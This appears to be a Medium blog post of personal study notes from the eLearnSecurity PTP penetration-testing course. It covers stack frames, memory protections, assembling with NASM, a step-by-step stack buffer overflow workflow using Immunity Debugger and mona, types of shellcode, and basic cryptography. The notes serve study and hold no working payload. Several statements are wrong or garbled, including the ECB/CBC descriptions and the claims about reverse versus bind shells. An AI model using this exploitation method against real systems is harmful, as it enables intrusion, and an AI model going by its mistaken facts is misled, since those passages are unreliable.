My PTP Notes from eLearnSecurity PDFs with help by Netriders Academy

CPU Architecture
  1. push ebp →the top of old stack frame
  2. mov ebp, esp → the base of new stack frame.
  3. sub esp, X → create new stack space.
  1. mov esp, ebp → to make the esp to the top of last stack frame.
  2. pop ebp → overwrite ebp.
  3. ret →to return or jump to the location of ebp.
  1. Address Space Layout Randomization -ASLR-:-the OS loads the same executable at different locations in memory every time. DLL does not ASLR protection.
  2. Data Execution Prevention-DEP-:-is a defensive hardware and software measure that prevents the execution of code from pages in memory that are not explicitly marked as executable.
  3. Stack Cookies-Canary-:-places a value next to the return address on the stack in the prologue function and check if it is there in epilogue function.
  1. .\setpaths.bat:- to know the status of the NASM if it’s working or not.
  2. nasm -f win32 demo1.asm -o demo1.obj:- to run the assembler and create object file.
  3. GoLink.exe /entry _main demo1.obj kernel32.dll user32.dll :- to create an executable file from the object file.
  1. Use IDE compiler
  2. Or by command line using gcc compiler:- gcc -m32 HelloStudents.c -o HelloStudents.exe
  • Stop the program while it is running.
  • Analyze the stack and its data.
  • Inspect registers.
  • Change the program or program variables and more.
  1. We check if the program is vulnerable to BOF attack. * Run the program and pass to many A’s value. If the program crashes, then it’s vulnerable.
  2. Determine How many A’s value we should pass to reach EIP address location.
  3. Pass the address location of the desired function.
  1. Analyze the debugger. *Immunity debugger is for 32 bit CPU. *X64 dbg is for 64 bit CPU.
  2. De-assemble the executing file of the program by ; objdump -d -Mintel goodpwd.exe > deassemble.txt
C++
Python
  • /X00 is called null byte. The strcpy function when it face null byte in the source function it will stop.
  • So, the payload that we will use it must be free of null byte, otherwise it won’t work.
  • We try to to enter values manually following this pattern:-
  • use IDA or immunity debugger.
  • use tools such as pattern create → sends random values to the vulnerable programs & pattern offset → defines how many values should be entered and what is the exact location of EIP→ these tools only work in metaspoit. (we will see how it’s work in metasploit module)
  • use mona with Immunity debugger.
  1. clone the project by the command :- git clone https://github.com/corelan/mona.git.
  2. copy mona.py file to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands.
  3. to configure mona work folder to save everything about mona we run this command inside immunity debugger !mona config -set workingfolder C:\ImmunityLogs\%p .
  4. open the vulnerable program in Immunity Debugger.
  5. create the data pattern by :!mona pc 100 .
  6. copy the pattern to the script(shellcode) as a payload.
  7. run the shell code.
  8. run the vulnerable program by Immunity Debugger.
  9. specify how many characters to reach the location of the EIP by !mona po EIP.
  10. To insert our shell code we have to find out the exact location of ESP. There are many ways to find out:- 1- by searching 2- by findjmmp2.py tool 3- by mona: !mona jmp -r esp -m kernel .
  11. put the result of !mona po EIP as junk data in the payload of the shell code then the ESP location then the shell code of the malware.
  12. create payload automatically with mona by : !mona suggest.
  13. to check for ASLR status: !mona noaslr.
  14. to check for all modules status: !mona modules.
  1. fill the junk data.
  2. rewrite the EIP.
  3. insert the payload(shell code){junk data + ESP Address + shell code of a malware or software)
  • Compiler → is a translator; translate the source code to the machine code. It’s platform dependent. It’s fast because it runs the code at once.
  • Interpreter → is an expression; no machine code. It’s platform independent. The devices must have their own interpreter. It’s slow because it runs line by line.
  • Intermediate → It combines compiler and interpreter. It generate the intermediate language (IL) from the source code and sends the IL to the destination devices, and the destination devices compile IL to machine code.
  • IDE → is Integrated Development Environment.
  • to disable automatic close of the console:-
  • pointers variables hold memory addresses.
  • it stores 1 byte=8 bits.
  • &m → returns the address of the value of variable m.
  • m* → returns the value of the address of variable m.
  • we declare a pointer : int *m.
  • Local shellcode or Privilege Escalation shellcode → require to get physical access to the machine, and enable to get the higher privilege.
  • Remote shellcode or Network shellcode or RCE Remote Code Execution shellcode → require to be connected to a protocol. It provide remote access to a machine.
  1. connected back(reverse) shellcode:-the victim machine request connection to the attacker machine. It’s working with detection systems or firewalls.
  2. bind (normal) shellcode:-the attacker machine request connection to the victim machine. It’s not working with detection systems or firewalls.
  3. Socket reuse shellcode:- socket is IP + port used to establish connections. It sends a shellcode to an opened connection before it close.
  • reverse shellcode and bind shellcode is most common. but socket reuse shellcode is not widely use because of its complexity, and already fixed the vulnerability.
  • Staged shellcode:- when the size of the shellcode that attackers want to send is bigger than the allowed space.
  1. Egg hunter:- divide the shellcode into two stages. the first one holds small piece of the shellcode and call the second stage.
  2. Omelet:- divide the shellcode into multiple stages. the each of them holds small piece of the shellcode and send them separately.
  3. Download and Execute:-It connects to the internet then downloads the rest of the shellcode then executes.
  1. The sleep function is provided by kernel32.dll file. to get the address of sleep function, we have to open kernel32.dll file in the immunity debugger or using the tool which is called arwin.
  2. write the assembly code.
  3. assemble it then de-assemble the object file to get the binary code(machine code)
  4. then write the binary code in the shellcode string with prefix \x and with no spaces
  • If we write the shellcode string as usual string, it will not be executable. We must write it as binary codes.
  • We can get created shellcode from exploit DB webpage

notes:-

  • if we have assembly code and we want the binary code of it, we generate the object file by (nasm -f win32 file.asm -o file.obj) the deassmpling it by (objdump -d -Mentil file.obj > file.txt.
  • if we have assembly code and we want the executable, we generate the object file and then use the linker.
  1. Confidentiality:-insure that only authorized users can access the information.
  2. Authentication:-insure that this is the right subject by comparing its confidentialities with trusted system.
  3. Integrity:-insure that only authorized users can change or alter the information.
  4. Non-repudiation:-create a proof so the senders cannot delay on their sending messages.
  1. EBC (Electronic Book code):- encrypt each block dependently .
  2. CBC (Cypher Book Chaining):- encrypt the block based on the previous block (independently).
  • Public key algorithm is different from public key certificate.
  • Public key algorithm is asymmetric encryption that uses two keys public & private. It encrypts by public key and decrypts by private key.
  • public key certificate is PKI that use digital certificate which includes the public key. It encrypts by private key ant decrypts by public key.
  1. known plaintext only attack:- the attacker knows the plaintext and ciphertext.
  2. know ciphertext only attack:- the attacker only knows ciphertext.
  1. Chosen plaintext only attack:- the attacker knows the plaintext and ciphertext. the attacker can choose the plaintext
  2. know ciphertext only attack:- the attacker only knows ciphertext and trying to know the plaintext.
After exploitation, we need to privilege escalation by accessing the hashes.

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Best practice: single source of truth (SSOT), vs DRY (don’t repeat yourself)

What I’ve learned and the life around it!

Journal 02 — Game Development — Get Started in Unity!

Break it into modules… Stitch it together

Don’t Do Agile, Be Agile

Free Code Camp: Basic HTML and HTML5

READ/DOWNLOAD@( Learning Robotics Using Python FULL BOOK PDF & FULL AUDIOBOOK

The New UI of TeamCode was released! Come and experience it now!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
HackingSkills

HackingSkills

More from Medium

Revenge of the Printers: CVE-2021–34527 PrintNightmare Vulnerability

Honeypot — Seoul, South Korea (Threat Analysis)

Reversing crackmes.one challenge — Trycrackme

[Day 22] Blue Teaming How It Happened | Advent of Cyber 3 (2021)